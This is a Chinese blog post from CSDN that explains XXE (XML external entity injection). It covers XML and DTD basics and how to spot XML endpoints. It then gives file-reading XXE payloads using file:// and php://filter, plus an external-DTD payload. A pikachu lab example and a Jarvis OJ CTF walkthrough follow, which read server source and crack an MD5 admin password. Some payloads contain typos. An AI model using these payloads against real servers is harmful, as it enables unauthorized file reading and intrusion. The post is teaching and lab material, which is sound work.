xml的xxe漏洞

最新推荐文章于 2024-06-03 07:00:00 发布
最新推荐文章于 2024-06-03 07:00:00 发布
阅读量4.2k 收藏 2
点赞数 3
分类专栏: 渗透测试 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_48907714/article/details/124413378
版权

XXE漏洞

在这里插入图片描述

XML概念

XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。

XML与HTML的主要差异

XML被设计为传输和存储数据,其焦点是数据的内容。
HTML被设计用来显示数据,其焦点是数据的外观。
HTML旨在显示信息,而XML旨在传输信息。

XML示例

<!--文档类型定义-->
<!DOCTYPE note [	<!--定义此文档时note类型的文档-->
<!ELEMENT note (to,from,heading,body)>	<!--定义note元素有四个元素-->
<!ELEMENT to (#PCDATA)>			<!--定义to元素为"#PCDATA"类型-->
<!ELEMENT from (#PCDATA)>		<!--定义from元素为"#PCDATA"类型-->
<!ELEMENT head (#PCDATA)>		<!--定义head元素为"#PCDATA"类型-->
<!ELEMENT body (#PCDATA)>		<!--定义body元素为"#PCDATA"类型-->
]]]>

<!--文档元素-->
<note>
    <to>Dave</to>
    <from>Tom</from>
    <head>Reminder</head>
    <body>You are a good man</body>
</note>

看不懂的话复习一下https://lalajun.github.io/2019/12/03/WEB-XXE/
还有DTD:
DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。

XXE注入

XXE就是xml的漏洞,比如命令执行、文件读取、内网攻击

检测方法

  1. 看他的数据包是不是xml类型的数据,如果是那就直接上payload,不需要它post的内容
<?xml version="1.0"?> 
<user>test</user><pass>pass</pass>
  1. 看它的MIME(Conetent-Type)是否为text/xml application/xml
  2. 盲注更改Conetent-Type的值,再将post的值改为xml的poyload类型,查看回显

利用方法

内部实体

内部实体
<?xml version = "1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTYTY rabbit SYSTEM "http://192.168.1.4:80/index.txt">
]>
<x>&rabbit;</x>

外部实体

外部实体
<?xml version = "1.0"?>
<!DOCTYPE test [
		<!ENTITY % file SYSTEM "http://127.0.0.1/evil2.dtd">
		%file;
]>
<x>&send;</x>

//下面的是写入文件的
evil2.dtd:
<!ENTITY send SYSTEM "file:///d:/test.txt">

外部引用可支持http,file等协议,不同的语言支持的协议不同,但存在一些通用的协议,具体内容如下所示:
在这里插入图片描述

实例

pikachu靶场XML

不知道为什么我没有回显,源码显示也有回显,不懂啊,靶场越更新越麻烦,建议大家用旧版,我也不至于细看代码 了,反正下面的语句是一定可以用的

<?xml version="1.0"?> 
<!DOCTYPE foo [    
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=c:/phpstudy_pro/WWW/pikachu/vul/rce/rce.php" > ]> 
<foo>&xxe;</foo

CTF-Jarvis-OJ-Web-XXE

先用nmap扫描IP和端口
ip:192.168.72.17
端口:80
在这里插入图片描述
直接访问没有实质性的结果
在这里插入图片描述
进行目录扫描,扫到有用的目录了/robots.txt
在这里插入图片描述
通过这个目录,又发现了/xxe/admin.php,打开发现需要登录,登录抓包,发现数据包POST请求的值为XML类型因此进行一下XXE注入。
在这里插入图片描述

接下来用XXEinjector工具进行注入就ok了
我直接上成功的payload(这是文件获取,并且base64加密)

<?xml version="1.0" ?><!DOCTYPE r [
<!ELEMENT r ANY>
	<!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=./xxe.php">
]>
<root>
<name>
&sp;
</name>
<password>
hj
</password>
</root>

在这里插入图片描述
成功之后进行解密,可以查看./xxe.php的源码(当然这个不重要,我们需要的是admin.php)
同理,查看admin.php
从中看到账号和加密的密码,密码为MD5加密,进行解密
在这里插入图片描述

解密后为admin@123
在这里插入图片描述
最后进入192.168.72.17/xxe/admin.php进行登录
在这里插入图片描述
点击flag又不显示,看来还是让读取内容
而且此次的文件在跟目录,需要写./flagmeout.php
在这里插入图片描述

继续解码就能看到flag
在这里插入图片描述

百密不疏
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】金和OA-C6-xmldeal-XXE
知黑而守白
01-25 176
金和OA协同办公管理系统软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。金和OA协同办公管理系统 XmlDeal 接口存在xxe漏洞。存在一处XML外部实体(XXE漏洞。攻击者通过精心构造的XML文件可能导致系统解析敏感信息,从而获取敏感数据或执行潜在的攻击。
WEB漏洞原理】XML&XXE利用检测绕过
过期的秋刀鱼
09-14 839
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害XXEXML的一个漏洞XXE产生根本原因:网站接受XML数据,没有对xml进行过滤。
xxe漏洞
qq_40390383的博客
04-19 252
xxe漏洞,全称xml外部实体注入漏洞xxe漏洞发生在应用程序解析xml输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害 XML 指可扩展标记语言(eXtensible Markup Language),是对html的补充 XML 被设计用来传输和存储数据。 DTD(文档类型定义)的作用是定义 XML 文档的合...
XML 相关漏洞风险研究
最新发布
有价值炮灰
06-03 1785
使用了这么久 XML,但是对其内部细节却不甚了解,本文就来补全这个缺憾。
JAXB血案之 XML外部实体注入漏洞(XXE)
weixin_47397751的博客
01-12 1159
1.漏洞描述 XML外部实体注入漏洞,即XXEXML External Entity),此漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。 2.JAXB是什么? JAXB实现了java对象与xml之间的转换,使用的注解主要有: (1)@XmlRootElement:用于类级别的注释,对应XML的根节点。参数: name 定义这个根节点的名称 namespace 定义这个根节点命名空间 (2)
金和OAeformaspx接口存在任意文件上传-1day未公开漏洞
weixin_43167326的博客
01-26 439
金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。金和OA jc6 ntko-upload存在任意文件上传漏洞,攻击者可以利用此漏洞获取服务器权限。
SCAN_XXE:利用XML XXE漏洞
05-07
在"SCAN_XXE:利用XML XXE漏洞"的主题中,我们将深入探讨这一安全威胁及其防范措施。 XML是可扩展标记语言(eXtensible Markup Language),广泛用于数据交换和配置文件。XML解析器在处理文档时,会识别并处理实体...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXEXML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细介绍 XXE 漏洞的利用方法,特别是任意...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE漏洞主要出现在应用接收并解析XML格式的数据时。如果服务器开启了外部实体加载功能,攻击者可以通过构造含有恶意外部实体的XML文档,诱使服务器去读取或执行非预期的资源。比如,攻击者可以定义一个外部实体来...
5、XXE漏洞pdf资料
10-15
总之,XXE漏洞利用了XML解析器处理外部实体时的不安全性。理解XML的结构和解析机制是防止这类攻击的关键。开发人员应采取适当的安全措施,确保XML解析过程安全,以防止攻击者通过XXE漏洞获取敏感信息或执行恶意操作...
105-web漏洞挖掘之XXE漏洞1
08-03
挖掘XXE漏洞的关键在于识别那些处理XML输入的代码点,尤其是涉及XML解析器的部分。以下是一些通用策略: 1. 检查所有接受XML输入的API或接口,寻找可能触发XML解析的代码。 2. 分析服务端如何处理XML数据,特别是...
初识XML------XXE漏洞
weixin_44770698的博客
06-09 444
初始XXE漏洞
《JAVA代码审计》(1)JAXB血案之 XML外部实体注入漏洞(XXE)
午夜安全
04-22 4553
(3)@XmlElement:将Java对象的属性映射为xml的节点,在使用@XmlElement时,可通过name属性改变java对象属性在xml中显示的名称。(2)@XmlAccessorType:用于指定由Java对象生成xml文件时对Java对象属性的访问方式。(4)@XmlAttribute:将Java对象的属性映射为xml的属性,并且可通过name属性为生成的xml属性指定别名。(1)@XmlRootElement:用于类级别的注释,对应XML的根节点。
XML漏洞分析
F1or_的博客
08-19 729
可以看见这里的函数其实是已经获得了calc,即我们传入的字符了,但是最后却没有返回,返回的是一个带有calc的ValueObjectImpl,而且你可以发现,现在的getValObject是在StringElementHandler的里面,对应前面一开始传入的hashmap对应值,也就是说在这里他截取了。看一下之前的xml文件,这一部分之前说过,当property不为空就可以进入循环,就是在下图这个位置,然后invoke,直接调用方法了,这里是先进行赋值。里面有个invoke,成功执行了。
XXE漏洞学习
qq_62078839的博客
04-23 392
漏洞原理 XXE漏洞就是XML外部实体注入,就是当xml引用外部实体并解析的时候会产生的漏洞xml解析器去获取其中的外部资源并存储到内部实体中,攻击者可引用外部实体对目标进行文件读取、命令执行、DDOS、内网探测等。 利用方式 命令执行 <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE a[ <!ENTITY test SYSTEM "命令"> ]> <c>&test</c>
Ueditor的XML文件上传导致存储型XSS(可以再试试xxe)和ssrf漏洞
weixin_50464560的博客
05-16 7482
UEditor 富文本web编辑器最新漏洞XML文件上传导致存储型XSS - 『原创发布区』 - 大神论坛 |脱壳破解|易语言|病毒分析|www.dslt.tech 一、Ueditor最新版XML文件上传导致存储型XSS 测试版本:php版v1.4.3.3 下载地址:https://github.com/fex-team/ueditor复现步骤: 1.上传一个图片文件 2.然后buprsuit抓包拦截 3.将uploadimage类型改为uploadfile,并修改文件后...
XXE漏洞
weixin_44940180的博客
08-14 883
XXExml external entity injection) 一、xxe漏洞 xml外部实体注入漏洞,发生在应用程序解析xml输入时,没有禁止外部实体的加载、导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。是XML注入的一种,普通的XML注入利用面比较狭窄,如果有的话也是逻辑类漏洞XXE扩大了攻击面。 xxe是一种针对xml终端的实施攻击,想要实施这种攻击需要在xml的payload的包含外部实体声明,且服务器本身允许实体扩展,这样就能读取web
Java XML漏洞解决方案
我要MEANING
07-23 2462
1:SAXReader添加 SAXReader saxReader = new SAXReader(false); saxReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); saxReader.setFeature("http://xml.org/sax/features/external...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值